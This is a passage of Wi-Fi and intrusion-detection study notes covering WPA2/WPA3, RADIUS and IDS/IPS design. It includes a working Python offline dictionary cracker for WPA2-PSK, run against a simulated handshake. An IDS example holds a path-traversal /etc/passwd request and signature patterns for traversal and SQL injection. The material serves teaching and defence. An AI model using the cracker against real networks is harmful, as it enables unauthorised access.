- Use strong, unique administrative passwords for APs and network devices.
- Regularly back up configurations.
- Keep firmware and software on APs, routers, and client devices up to date with the latest security patches.
- Implement robust authentication and encryption (e.g., WPA3) and enable Protected Management Frames (802.11w) where clients support it.
Network Monitoring:
- Actively monitor the wireless network for unusual activity, high error rates, or signs of interference.
- Use Wi-Fi analysis tools to identify and locate sources of interference or malicious activity quickly.
- Intrusion Detection/Prevention Systems (IDS/IPS) with wireless capabilities (WIDS/WIPS) can detect bursts of deauthentication frames, abnormal Duration values, and unknown BSSIDs advertising your SSIDs, and sometimes mitigate such attacks.
Utilize Less Congested Frequency Bands:
- Whenever possible, favor the 5 GHz and 6 GHz (Wi-Fi 6E) bands over the 2.4 GHz band. These bands offer more channels and are generally less crowded and less prone to interference from common household devices.
Physical Security:
- Control physical access to APs to prevent tampering or unauthorized connections.
Channel Management:
- Conduct site surveys to plan channel allocation effectively and minimize co-channel and adjacent-channel interference.
10. 802.11 Authentication Methods
Wireless networks use authentication methods to verify the identity of devices attempting to connect. Early and basic approaches include:
a) Open System Authentication (Open Network):
No Password Required: Clients do not need to provide any credentials (like a password) to authenticate.
Any Client Can Associate: Essentially, any device that requests to connect will be allowed to authenticate and then associate.
Common Use: Often used for providing free, public Wi-Fi access (e.g., in cafes, airports), though often in conjunction with a captive portal for terms acceptance or secondary login. A captive portal gates access to the upstream network only; it does not encrypt the air interface.
Security Implication: Offers no confidentiality for the connection itself (unless higher-layer encryption like HTTPS is used). The client bears full responsibility for securing their own communications. Data transmitted over an open Wi-Fi network without further encryption is vulnerable to eavesdropping and tampering by anyone in range.
b) Shared Key Based Authentication:
This category broadly covers methods where access is controlled by a key or passphrase known to both the Access Point and the client: WEP, and the "Personal" or "PSK (Pre-Shared Key)" modes of WPA, WPA2, and WPA3.
WEP (Wired Equivalent Privacy): An early and now deprecated/insecure method using a static shared key.
WPA/WPA2/WPA3 (Personal/PSK modes): Use a pre-shared key (passphrase) that is configured on both the AP and clients. These are significantly more secure than WEP.
Note: Enterprise versions of WPA/WPA2/WPA3 use 802.1X/EAP, a more robust, individual credential-based authentication method, rather than a single shared key for all users.
11. Authentication Methods Using a Shared Key (Personal/PSK Modes)
These methods use a pre-shared key or passphrase known to both the AP and clients.
WEP (Wired Equivalent Privacy):
- The original security protocol for 802.11. Used the RC4 stream cipher with a static, often short, shared key and a 24-bit IV that repeats quickly.
- Security Status: DEPRECATED and SEVERELY INSECURE. Contains fundamental cryptographic flaws that allow the key to be recovered from captured traffic in minutes and the traffic decrypted. Should NEVER be used.
WPA (Wi-Fi Protected Access):
- An interim security standard developed by the Wi-Fi Alliance to address WEP's weaknesses on hardware that could not yet support WPA2.
- Encryption: Primarily used TKIP (Temporal Key Integrity Protocol), which derived a fresh key for each packet and included a Message Integrity Check (MIC) called Michael. TKIP was designed as a wrapper around RC4 to improve its security.
- Security Status: DEPRECATED and INSECURE. While an improvement over WEP, TKIP also has known vulnerabilities.
WPA2 (Wi-Fi Protected Access II):
- A robust security standard that became the industry norm for many years.
- Encryption: Mandates the use of AES (Advanced Encryption Standard) with CCMP (Counter Mode with CBC-MAC Protocol). AES-CCMP provides strong encryption and integrity.
Modes:
- WPA2-Personal (WPA2-PSK): Uses a pre-shared key (passphrase).
- WPA2-Enterprise: Uses 802.1X/EAP for individual user authentication with a RADIUS server.
- Security Status: Generally considered secure, especially WPA2-Enterprise. WPA2-Personal is vulnerable to offline dictionary attacks if a weak passphrase is used: the PMK is derived only from the passphrase and the SSID, so anyone who captures a client's 4-way handshake (or provokes one with a deauthentication) can test candidate passphrases against the handshake MIC offline, without further contact with the network.
WPA3 (Wi-Fi Protected Access III):
- The latest generation of Wi-Fi security, offering significant improvements over WPA2.
- Stronger Protection against Password Guessing (WPA3-Personal): Replaces the PSK handshake with SAE (Simultaneous Authentication of Equals), a password-authenticated key exchange. A captured exchange cannot be used to test passphrases offline, so each guess costs the attacker a live exchange with the AP, which can be rate-limited; SAE also provides forward secrecy.
- Enhanced Encryption (WPA3-Enterprise): Offers an optional 192-bit security suite (CNSA suite, using AES-GCMP-256) for higher security requirements, while still supporting AES-CCMP (128-bit).
- Protected Management Frames (PMF): Mandates the use of PMF (802.11w) to protect certain types of management frames (like deauthentication/disassociation frames) from spoofing, enhancing network resilience.
- Easier IoT Onboarding (Wi-Fi Easy Connect™): Simplifies connecting devices without robust display interfaces.
- Improved Open Network Security (Wi-Fi Enhanced Open™): Provides opportunistic encryption (OWE - Opportunistic Wireless Encryption) for open networks, encrypting traffic even without authentication. OWE protects against passive eavesdropping only; it does not authenticate the AP.
- Security Status: The current recommended standard for Wi-Fi security.
12. Home Wi-Fi Authentication Modes (Typically under WPA2/WPA3)
When configuring Wi-Fi security, especially on home routers, you'll often encounter two main modes: Personal (PSK) and Enterprise (802.1X).
a) "Personal" Mode (PSK - Pre-Shared Key):
Primarily designed for home users and small offices/businesses.
How it Works:
- A single password is configured on the Access Point (AP)/router.
- All clients wishing to connect to the Wi-Fi network must use this same shared password.
Advantages:
- Simple to configure and manage: No external authentication server is required.
Disadvantages:
- If the password is compromised, all devices using it are at risk. With WPA2-PSK, anyone who knows the passphrase and captures another client's 4-way handshake can also decrypt that client's traffic.
- Revoking access for a specific device means changing the password for everyone.
- Vulnerable to offline dictionary attacks if a weak passphrase is used (especially with WPA2-PSK; WPA3-Personal/SAE is more resilient).
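The following is an added example, not code from the original document, showing why the last disadvantage holds for WPA2-PSK (sections 11 and 12). It implements the real WPA2 key derivation in Python: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), PTK from the PMK, both MAC addresses and both nonces via PRF-512, and the EAPOL-Key MIC (HMAC-SHA1 truncated to 128 bits, key descriptor version 2). The "captured" message 2 of the 4-way handshake is simulated with that derivation; the SSID, MAC addresses, nonces, passphrase and wordlist are constructed. Everything the attacker needs is in the capture, so the loop never talks to the network.

```python
"""Why a weak WPA2-PSK passphrase falls to an offline dictionary attack.
Added example, not from the page. The handshake 'capture' is simulated with the real key
derivation (PBKDF2 -> PMK, PRF-512 -> PTK, HMAC-SHA1 MIC); MACs, nonces and the wordlist are constructed."""
import hashlib
import hmac
import struct

MIC_OFFSET, MIC_LEN = 81, 16     # position and size of the Key MIC field in an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes): nothing else goes in."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || counter) for counter 0..3."""
    return b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                    for i in range(4))[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from PMK, AP address (AA), client address (SPA) and both nonces; the KCK is its first 16 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): HMAC-SHA1 over the frame, truncated to 128 bits."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_msg2(snonce: bytes) -> bytes:
    """EAPOL-Key message 2 of the 4-way handshake with the MIC field zeroed."""
    key_info = 0x010A    # descriptor version 2, pairwise key, Key MIC present
    body = (struct.pack("!BHH", 2, key_info, 16) + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(MIC_LEN) + struct.pack("!H", 0))
    return struct.pack("!BBH", 2, 3, len(body)) + body


def simulate_capture(ssid, passphrase, aa, spa, anonce, snonce) -> bytes:
    """What a sniffer sees in message 2: SNonce in the clear plus a MIC keyed with the KCK."""
    frame = build_msg2(snonce)
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]


def crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Offline: every guess is checked against the captured MIC; no frame is ever sent."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    zeroed = msg2[:MIC_OFFSET] + bytes(MIC_LEN) + msg2[MIC_OFFSET + MIC_LEN:]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None


# Constructed scenario.
SSID = "HomeNet"
AA = bytes.fromhex("02aabbcc0001")            # AP MAC (authenticator address)
SPA = bytes.fromhex("02ddeeff0002")           # client MAC (supplicant address)
ANONCE = bytes(range(32))                     # nonces are random in practice; fixed here
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "letmein", "summer2024", "qwerty123", "HomeNet1"]
CAPTURED_MSG2 = simulate_capture(SSID, "summer2024", AA, SPA, ANONCE, SNONCE)

if __name__ == "__main__":
    print("recovered passphrase:", crack_psk(SSID, AA, SPA, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST))
```

The cost per guess is one PBKDF2 run of 4096 iterations, which GPU-based tools perform hundreds of thousands of times per second, so the only defence in WPA2-PSK is passphrase entropy. SAE removes the offline property: the captured exchange no longer lets a guess be checked without a fresh exchange with the AP.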

b) "Enterprise" Mode (RADIUS / 802.1X / EAP):
Designed for businesses, organizations, and larger networks requiring more robust security and centralized management.
How it Works:
- Each user (or device) authenticates with unique credentials (e.g., username and password, digital certificate).
- These credentials are verified by a central authentication server, typically a RADIUS (Remote Authentication Dial-In User Service) server. The AP acts as an authenticator, relaying EAP messages between the client (supplicant) and the RADIUS server, and each client ends up with its own session keys.
Advantages:
- Enhanced Security: Individual credentials mean access can be granted or revoked on a per-user basis. Stronger authentication methods can be used (e.g., EAP-TLS with client certificates).
- Centralized Management: User accounts and access policies are managed on the RADIUS server.
- Scalability: Better suited for larger numbers of users and devices.
Disadvantages:
- More Complex to Set Up: Requires a dedicated RADIUS server and more involved configuration on both the APs and potentially client devices. In particular, clients must be configured to validate the RADIUS server's certificate; otherwise an evil twin running its own RADIUS server can harvest credentials (or password hashes) from password-based EAP methods.
Common Example: Used in corporate environments, universities, and other organizations.
(Note: the same Personal/Enterprise distinction discussed here applies to WPA and WPA3 as well.)
13. Wi-Fi Encryption Methods (Protocols used with WPA/WPA2/WPA3)
Encryption is crucial for protecting the confidentiality and integrity of data transmitted over wireless networks.
a. TKIP (Temporal Key Integrity Protocol):
Primarily used with WPA (Wi-Fi Protected Access).
TKIP was designed as an interim solution to improve upon the severe weaknesses of WEP without requiring immediate hardware replacement (it could often run on WEP-capable hardware).
Mechanism:
It still used the RC4 stream cipher (like WEP) at its core. However, it introduced significant enhancements:
- Per-Packet Key Mixing: Generates a unique encryption key for each data packet, making it much harder to crack than WEP's static key.
- Message Integrity Check (MIC): Implemented a MIC called "Michael" to protect against data tampering.
- Sequence Counter: Helped prevent replay attacks.
- Security Status: While an improvement over WEP, TKIP also has known vulnerabilities and is now considered deprecated and insecure. It should not be used if stronger options like AES-CCMP are available; WPA3 does not allow it at all.
b. AES-CCMP (Advanced Encryption Standard with Counter Mode CBC-MAC Protocol):
The mandatory encryption method for WPA2 and the baseline for WPA3 (the WPA3-Enterprise 192-bit mode uses AES-GCMP-256 instead).
Used to provide strong encryption and data integrity for wireless communications.
Mechanism:
- Uses the AES (Advanced Encryption Standard) block cipher, which is a highly secure and widely adopted encryption algorithm, with a 128-bit key.
- Operates in CCMP (Counter Mode with CBC-MAC Protocol) mode. CCMP combines AES in counter mode for encryption (confidentiality) with a CBC-MAC over header fields and payload for message authenticity and integrity, and a 48-bit packet number that also serves as replay protection.
- Security Status: Strong and currently considered secure. AES-CCMP is the preferred method for Wi-Fi encryption when WPA2 or WPA3 is used.
Configuration Example:
- When configuring Wi-Fi security, an administrator would typically choose WPA2 or WPA3 and select AES (which implies CCMP) as the encryption method for the strongest protection. For example, selecting "WPA2 Personal" with "AES" encryption rather than "WPA/WPA2 mixed" with "TKIP+AES", since the mixed setting lets a client negotiate the weaker cipher.
14.Enterprise Wi-Fi Authentication (WPA/WPA2/WPA3-Enterprise)
Enterprise security mode for Wi-Fi provides robust, centralized authentication
suitable for businesses and organizations. It relies on the AAA (Authentication,
Authorization, and Accounting) framework, typically implemented using a
RADIUS (Remote Authentication Dial-In User Service) server.
Key Components and Concepts:
RADIUS Server:
A central server that handles user authentication requests, makes authorization
decisions, and collects accounting information.
AAA Framework:
 Authentication: Verifies the identity of users attempting to connect to the
network (e.g., using usernames/passwords, digital certificates via EAP
methods).
 Authorization: Determines the level of access and network resources an
authenticated user is permitted to use (e.g., VLAN assignment, access to
specific services).
 Accounting: Tracks user activity, such as connection times, data usage,
and session details, for auditing and billing purposes.
Access Point as RADIUS Client:
The AP acts as an intermediary (RADIUS client or authenticator). It forwards
authentication requests from wireless clients to the RADIUS server and enforces
the decisions made by the server.
Configuration Parameters (on the AP for connecting to the RADIUS server):
RADIUS Server IP Address:
 The IP address of the RADIUS server the AP will communicate with.
RADIUS Port Numbers (UDP):
 Authentication Port: Officially UDP port 1812 (legacy UDP port 1645).
 Accounting Port: Officially UDP port 1813 (legacy UDP port 1646).
 The AP and RADIUS server must be configured to use the same ports.
Shared Secret (Shared Key):
 A secret key configured on both the AP and the RADIUS server.
 RADIUS uses it to authenticate the AP to the server and to validate the
server's replies (Request/Response Authenticator fields), to hide the
User-Password attribute in plain password authentication, and to wrap the
keying material (MS-MPPE-Recv-Key/Send-Key) the server returns after a
successful EAP exchange. It does not encrypt the RADIUS conversation as a
whole, so RADIUS traffic should be confined to a management VLAN or carried
over TLS/IPsec. It is not the password used by end-users to log in to the
Wi-Fi.
 Process: When a user tries to connect to a WPA/WPA2/WPA3-Enterprise
network, the AP facilitates an EAP (Extensible Authentication Protocol)
exchange between the client device and the RADIUS server: EAP is carried in
EAPOL (802.1X) frames on the wireless side and in RADIUS EAP-Message
attributes on the wired side, and the AP only relays it. On Access-Accept
the server hands the AP the PMK, and AP and client then run the 4-way
handshake to derive the session keys.
15.IT Security: WLAN Security - Importance and Goals
Unlike wired networks where data is physically contained within cables (as
electrical or light signals), Wireless Local Area Networks (WLANs) transmit data
using radio waves.
These radio waves propagate through the air and can potentially be intercepted
by anyone within the signal range of an Access Point (AP) using appropriate
equipment.
This inherent broadcast nature makes WLANs more susceptible to eavesdropping
and unauthorized access if not properly secured.
Critical Need for WLAN Security:
Due to these vulnerabilities, implementing robust security measures for WLANs
is critically important to protect data and network resources.
Security Services Provided by 802.11 Standards (and amendments like
WPA/WPA2/WPA3):
The IEEE 802.11 Wi-Fi standards, along with their security enhancements, aim to
provide a layer of security for wireless data by addressing the following core
principles:
Authentication:
 Verifying the identity of users and devices attempting to connect to the
wireless network.
 Ensuring that only authorized entities can gain access.
Confidentiality (Encryption):
 Protecting the secrecy of data transmitted over the air by encrypting it.
 Making the data unreadable to unauthorized parties who might intercept
it.
Integrity:
 Ensuring that data transmitted over the wireless network has not been
altered or tampered with during transit.
 Mechanisms (like Message Integrity Checks - MICs) are used to detect any
modifications.
16.WLAN Security: Authentication
Clients must authenticate with an Access Point (AP) to gain network access.
Often, this involves a static password stored on the client device.
Vulnerabilities of Simple Password-Based Authentication:
 Compromised Credentials/Device: If a device with the stored password is
stolen or lost, or if the password itself is compromised, unauthorized
access can occur.
 Connection to Rogue APs (Evil Twins): Clients might unknowingly connect
to a malicious AP broadcasting the same SSID as a legitimate one, especially
if only the client authenticates to the AP. In Enterprise networks the rogue
can then harvest EAP credentials (or MSCHAPv2 challenge/response hashes)
from clients that do not check the server certificate.
Solution: Mutual Authentication
To enhance security, authentication should be bidirectional (mutual):
 The client authenticates to the AP.
 The AP also authenticates itself to the client.
 This helps prevent clients from connecting to illegitimate APs. In
WPA2/WPA3-Enterprise the server proves its identity with a certificate
inside the EAP tunnel (PEAP, EAP-TTLS, EAP-TLS), so the supplicant must be
configured to validate that certificate (trusted CA plus expected server
name); a client that skips this check has no protection against an evil
twin. WPA3-Personal (SAE) gives mutual authentication by construction, since
both sides must know the passphrase to complete the handshake, and even the
WPA2-Personal 4-way handshake proves that both sides hold the same PMK.
17.WLAN Security: Confidentiality (Encryption)
To protect data transmitted over a wireless network from eavesdropping, it must
be encrypted by the sender and decrypted by the intended recipient.
Key Management for Confidentiality:
Pairwise/Unicast Keys:
 The Access Point (AP) negotiates a unique encryption key with each
individual client associated with it.
 This key (e.g., Pairwise Transient Key - PTK in WPA2/WPA3) is derived in
the 4-way handshake from the PMK, both MAC addresses and two fresh nonces,
and is used to encrypt data transmitted directly between the AP and that
specific client (unicast traffic).
 This ensures that communication between the AP and one client cannot be
easily decrypted by other clients on the same network. Caveat: on a
WPA2-Personal network every client derives its PTK from the same passphrase,
so anyone who knows the passphrase and captures a client's 4-way handshake
can compute that client's PTK and decrypt its traffic; WPA3-Personal (SAE)
removes this weakness because each session's PMK is fresh.
Group Keys:
 The AP generates and distributes a group encryption key (e.g., Group
Temporal Key - GTK in WPA2/WPA3) to all clients currently associated with
it, wrapped under each client's KEK during the 4-way handshake.
 This group key is used to encrypt broadcast and multicast traffic (e.g., ARP
requests, some types of service discovery) that needs to be sent from the
AP to all connected clients simultaneously. Because every associated client
holds the GTK, it should be rotated when a client leaves.
 Example: a client sends data encrypted with its unique pairwise key to the
AP, making it unreadable to other clients in the vicinity.
18.WLAN Security: Integrity (Message Integrity Check - MIC)
Message Integrity Check (MIC) is a security mechanism used in WLANs to protect
against data falsification or tampering. It ensures that the data received is the
same as the data sent and has not been altered in transit.
Process:
Sender Side:
 Before transmission, a MIC value is calculated over the plaintext message
(or relevant parts of the frame, including some header information). This
MIC is like a cryptographic checksum.
 The original message and its MIC are then typically protected (e.g., the
message is encrypted, and the MIC might be encrypted with it or
appended to the encrypted payload, depending on the protocol like
CCMP).
 The protected message (including or associated with the MIC) is sent to
the recipient.
Recipient Side:
 The recipient receives the protected message.
 The recipient decrypts the message payload (if encrypted).
 The recipient independently recalculates the MIC on the received
(decrypted) message data using the same algorithm and key as the
sender.
 The recipient then compares the MIC it just recalculated with the MIC that
was received from the sender.
Verification Outcome:
 If the two MIC values MATCH: This provides strong assurance that the data
has not been altered during transmission. Integrity is maintained.
 If the two MIC values DO NOT MATCH: This indicates that the data has
been tampered with or corrupted in transit, and the packet is typically
discarded.
Protocols:
 CCMP (used in WPA2/WPA3) computes its MIC with AES CBC-MAC as part of the
CCM operation, providing confidentiality (AES counter mode) and
integrity/authenticity in one pass over the frame. TKIP (used in the original
WPA) also had a MIC (called "Michael"), but it was weak and had to be backed
by countermeasures that shut TKIP traffic down for 60 seconds after two MIC
failures; TKIP is deprecated and should be disabled.
19.IT Security: Intrusion Detection and Prevention Systems (IDS/IPS)
IDS (Intrusion Detection System)
What is an IDS?
 An IDS is a security system (software or hardware) that monitors network
traffic or system activities for malicious actions or policy violations. Its
primary role is to detect potential intrusions and alert administrators. It is
a passive system.
The interest/benefit of using an IDS? Why deploy an IDS? What are its
advantages?
 To gain visibility into network/system security events and detect attacks
that might bypass other defenses (like firewalls).
 Real-time monitoring and early attack detection (potentially before damage
is done), which reduces the risk of being compromised.
 Complements other security tools (defense-in-depth) and aids regulatory
compliance (e.g., ISO 27001).
 Provides logs for incident analysis and forensics.
The types of IDS?
Common types (by deployment) include:
 NIDS (Network-based IDS): Monitors traffic on the network.
 HIDS (Host-based IDS): Monitors activities on individual hosts/endpoints.
 WIDS (Wireless IDS): Monitors the radio environment for rogue APs,
unauthorized clients and 802.11 attacks such as deauthentication floods.
 NBA (Network Behavior Analysis systems): Focuses on detecting abnormal
traffic patterns (flows, volumes) rather than specific packet content, using
behavioral baselines; sometimes considered a subtype of NIDS.
 Hybrid IDS: Combines several of these deployments and detection methods.
Common types (Detection Methods) include:
 Signature-based IDS: Detects known attack patterns (signatures).
 Anomaly-based IDS: Detects deviations from normal behavior baselines.
 Heuristic-based detection: Uses rules or AI-like logic to assess behavior (a
mix of signature + anomaly). More flexible but harder to fine-tune.
 Policy-based detection: Triggers alerts based on violations of pre-defined
security policies (e.g., “no FTP access after hours”). Very specific and
controlled.
Architecture of an IDS? Main components (capture, analysis, alerts)
 Sensors/Capture Agents: Collect data (network packets for NIDS, system
logs/events for HIDS).
 Analysis Engine: Processes the collected data, applying detection rules or
algorithms.
 Alerting/Reporting System: Notifies administrators of detected incidents
and logs events.
 (Management Console): Often a central interface for configuration and
viewing alerts.
Operating mode of an IDS
Operates passively ("out-of-band"). It monitors a copy of the traffic or system
logs without being directly in the data path. It detects and alerts but doesn't
block traffic itself.
How does an IDS work?
It collects data (network traffic or host logs), analyzes this data against known
attack signatures or established baselines of normal behavior, and if a match or
significant deviation is found, it triggers an alert.
Examples of IDS solutions:
 Open Source: Snort, Suricata, OSSEC (HIDS).
 Commercial: Many vendors offer IDS capabilities as standalone products or
integrated into broader security platforms (e.g., within NGFWs, SIEM
solutions).
IPS (Intrusion Prevention System):
What is an IPS?
 An IPS is a security system that monitors network/system activities for
malicious actions and, unlike an IDS, can actively block or prevent
detected intrusions in real-time. It is an active, inline system.
The interest/benefit of using an IPS? Why deploy an IPS? What are its
advantages?
 Interest/Why Deploy: To automatically stop known attacks before they can
impact systems, reducing the window of exposure and reliance on manual
intervention.
 Advantages: Real-time threat prevention, reduces workload on security
staff by automating responses to common attacks, enforces security
policies actively, complements firewalls with deeper inspection.
The types of IPS?
 Same split as for IDS: NIPS (network, inline), HIPS (host, hooks system
calls/processes), WIPS (wireless, e.g., containing rogue APs), with the same
detection methods (signature, anomaly, heuristic, policy).
Architecture of an IPS?
 Similar components to IDS (sensors, analysis engine) but with an added
enforcement/blocking mechanism. Crucially, NIPS are deployed inline in
the network path.
Operating mode of an IPS?
 Operates actively ("in-band" or inline). It sits directly in the path of
network traffic (for NIPS) or monitors system calls directly (for HIPS) to
inspect and block threats before they reach their target.
 Caveat: because it is inline, a false positive blocks legitimate traffic,
and the device adds latency and a potential point of failure. Decide
explicitly whether it should fail open (pass traffic) or fail closed (drop
traffic) when overloaded or crashed, and tune rules in detect-only mode
before enabling blocking.
How does an IPS work?
 It inspects traffic/activity in real-time. If malicious activity matching a
signature or anomalous behavior is detected, the IPS can take immediate
action, such as dropping packets, blocking connections, or terminating
malicious processes.
Examples of IPS solutions:
 Open Source: Snort (can run in IPS mode), Suricata (can run in IPS mode).
 Commercial: Many NGFWs have integrated IPS capabilities; standalone IPS
appliances are also available from various security vendors.
20.Network Security: IDS and Zero-Day Vulnerabilities
A zero-day vulnerability is a security flaw in software or hardware that has been
discovered (often by attackers) but is not yet known to the vendor or the public,
and for which no official patch or fix is available.
The term "zero-day" refers to the fact that the vendor has had "zero days" to
address the vulnerability before it can be actively exploited by cybercriminals.
While an IDS might not have a specific signature for a brand-new zero-day
exploit, it can still play a role thanks to:
 Anomaly Detection: Behavior-based or anomaly-based IDS may detect
suspicious activities or deviations from normal network/system behavior
that could be indicative of a zero-day exploit attempt or post-exploitation
activity.
 Heuristics: Some IDS use heuristics that might flag exploit-like patterns
even without a specific signature.
21.NIDS Placement: Upstream (Outside/Before) the Firewall
[Internet] ---> [NIDS] ---> [Firewall] ---> [Internal Network]
Characteristics of this Placement:
Visibility: The NIDS sees all traffic originating from the Internet before it is
filtered by the firewall.
 Pros: Can detect attacks that the firewall might block, providing a broader
view of attempted intrusions and attack trends. Useful for threat
intelligence gathering.
 Cons: The NIDS processes a larger volume of traffic, including malicious
traffic that the firewall would have dropped anyway. This can lead to more
alerts (potentially more false positives or "noise") and higher processing
load on the NIDS.
It helps identify what types of attacks are being launched against the network
perimeter.
22.NIDS Placement: Downstream (Inside/After) the Firewall
[Internet] ---> [Firewall] ---> [NIDS] ---> [Internal Network]
Characteristics of this Placement:
Visibility: The NIDS sees only the traffic that has been allowed through the
firewall.
 Pros: Reduces the volume of traffic the NIDS needs to analyze, as the
firewall has already filtered out a significant amount of
unwanted/malicious traffic. Allows the NIDS to focus on detecting attacks
that have bypassed the firewall or threats originating from within the
network (if the NIDS is monitoring internal traffic segments). Can lead to
fewer alerts, potentially with a higher proportion of true positives.
 Cons: The NIDS will not see attacks that were successfully blocked by the
firewall, potentially missing some threat intelligence.
This placement helps identify threats that have managed to get past the initial
perimeter defense.
23.NIDS Placement: Monitoring Multiple Segments (e.g., DMZ, Internal LAN)
In more complex network architectures, NIDS sensors can be deployed to
monitor traffic at various strategic points:
A central firewall creates distinct zones: Internet (unsecure), DMZ (semi-trusted),
and Internal LAN (secure).
NIDS sensors are placed to monitor:
 Traffic between the Internet and the Firewall (Perimeter): Sees all external
traffic attempts.
 Traffic within the DMZ or to/from DMZ servers: Monitors activity related to
publicly accessible services (e.g., web servers, email servers) located in
the DMZ. This is crucial as DMZ servers are common targets.
 Traffic within the Internal LAN or between the LAN and other zones:
Monitors for internal threats, compromised internal hosts, or attacks that
have bypassed perimeter defenses.
Benefits of Multi-Sensor Deployment:
 Provides granular visibility into traffic flows across different network
segments.
 Helps detect threats specific to each zone (e.g., attacks against public
servers in the DMZ, lateral movement within the internal network).
 Offers a more comprehensive intrusion detection capability as part of a
defense-in-depth strategy.
 A "Centralized Administration" console often collects and correlates alerts
from all distributed NIDS sensors.
24.Logical Architecture of an Intrusion Detection System (IDS)
An IDS, whether network-based (NIDS) or host-based (HIDS), generally consists
of three main logical components:
Sensors (Data Collection / Capture):
 Responsible for collecting the raw data that will be analyzed for signs of
intrusion.
 NIDS: Sensors are network interfaces that capture network packets (often
using libraries like `libpcap` and filters like BPF to select relevant
traffic), fed from a switch SPAN/mirror port or a network TAP.
 HIDS: Sensors are agents or processes on the host that collect data such
as system logs, application logs, file system changes, system calls, and
local network activity.
 Note: NIDS sensors can sometimes miss packets if network traffic volume
is excessively high (overload), and they cannot inspect the payload of
encrypted traffic (TLS, SSH, VPN) unless it is decrypted in front of them;
for such traffic they see only metadata (addresses, ports, volumes, TLS
handshake fields).
Analysis Engine:
 The core component that processes the data collected by the sensors and
attempts to identify malicious activity or policy violations.
Detection Methods:
 Signature-Based Detection (Misuse Detection): Compares collected data
against a database of known attack patterns (signatures). Effective for
known threats but cannot detect novel attacks.
 Anomaly-Based Detection (Behavioral Detection): Establishes a baseline of
normal network or system behavior. It then monitors for deviations from
this baseline, which could indicate an attack. This can detect
new/unknown attacks but may also generate more false positives.
 Techniques include statistical analysis, heuristics, and increasingly,
machine learning for modern IDS.
Management Console (Alerting & Reporting):
 When the analysis engine flags a potential security event:
 Generates Alerts: Notifies administrators or security personnel about the
detected incident (e.g., via email, SMS, system messages, dashboard
notifications).
 Logging: Records details of the event for later analysis and auditing.
 Reporting: Often provides tools for generating reports on detected
activities and system status.
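The two detection methods listed in sections 19 and 24, and the zero-day point of section 20, as an added example that is not part of the original notes and is not code from Snort, Suricata or any other IDS. It runs a tiny signature rule base and a learned per-source request-rate baseline over constructed web-server log lines (format `ip method path status`, one per line); every IP address, path and rule name is made up. The brute-force host matches no signature but is caught by the baseline, which is the only kind of detection available for a genuinely new exploit.

```python
"""Signature-based vs anomaly-based detection over constructed web access logs
(added example; not code from any IDS product). Every log line is made up."""
import re
from collections import Counter
from statistics import mean, pstdev
from urllib.parse import unquote_plus

# Training period: ordinary browsing, used only to learn the baseline.
TRAINING_LOG = "\n".join(
    f"{ip} GET /page{i}.html 200"
    for ip, n in [("10.0.0.5", 3), ("10.0.0.6", 4), ("10.0.0.7", 5),
                  ("10.0.0.8", 4), ("10.0.0.9", 3), ("10.0.0.10", 5)]
    for i in range(n)
)

# Live period: normal users, one known exploit attempt (matches a signature)
# and a directory brute-force from one host (no signature, but abnormal rate).
LIVE_LOG = "\n".join(
    ["10.0.0.5 GET /index.html 200",
     "10.0.0.5 GET /about.html 200",
     "10.0.0.7 GET /login 200",
     "10.0.0.7 POST /login 302",
     "10.0.0.9 GET /search?q=wifi 200",
     "203.0.113.4 GET /cgi-bin/test.cgi?file=../../../../etc/passwd 404"]
    + [f"198.51.100.8 GET /admin{i} 404" for i in range(30)]
)

# Misuse detection: a small rule base of patterns over the (decoded) path.
SIGNATURES = [
    ("path-traversal", re.compile(r"\.\./|%2e%2e", re.I)),
    ("etc-passwd-read", re.compile(r"/etc/passwd", re.I)),
    ("sqli-tautology", re.compile(r"('|%27)\s*or\s+1\s*=\s*1", re.I)),
]

LINE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3})$")


def parse_log(text: str) -> list:
    """Parse lines into events; URL-decode the path so %2e%2e or %20 style
    encoding does not slip past the signatures. Malformed lines are dropped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            ip, method, path, status = m.groups()
            events.append({"ip": ip, "method": method,
                           "path": unquote_plus(path), "status": int(status)})
    return events


def signature_alerts(events: list) -> list:
    """Return (ip, rule) for every event whose path matches a known pattern."""
    return [(e["ip"], name) for e in events
            for name, rx in SIGNATURES if rx.search(e["path"])]


def build_baseline(events: list) -> dict:
    """Learn requests-per-source from a period believed to be clean.
    The std is floored at 1 so a very uniform baseline does not alert on noise."""
    counts = list(Counter(e["ip"] for e in events).values())
    return {"mean": mean(counts), "std": max(pstdev(counts), 1.0)}


def anomaly_alerts(events: list, baseline: dict, k: float = 3.0) -> list:
    """Flag sources more than k standard deviations above the learned rate.
    This catches the brute-force host although no signature describes it."""
    limit = baseline["mean"] + k * baseline["std"]
    per_ip = Counter(e["ip"] for e in events)
    return sorted(ip for ip, n in per_ip.items() if n > limit)


def run() -> dict:
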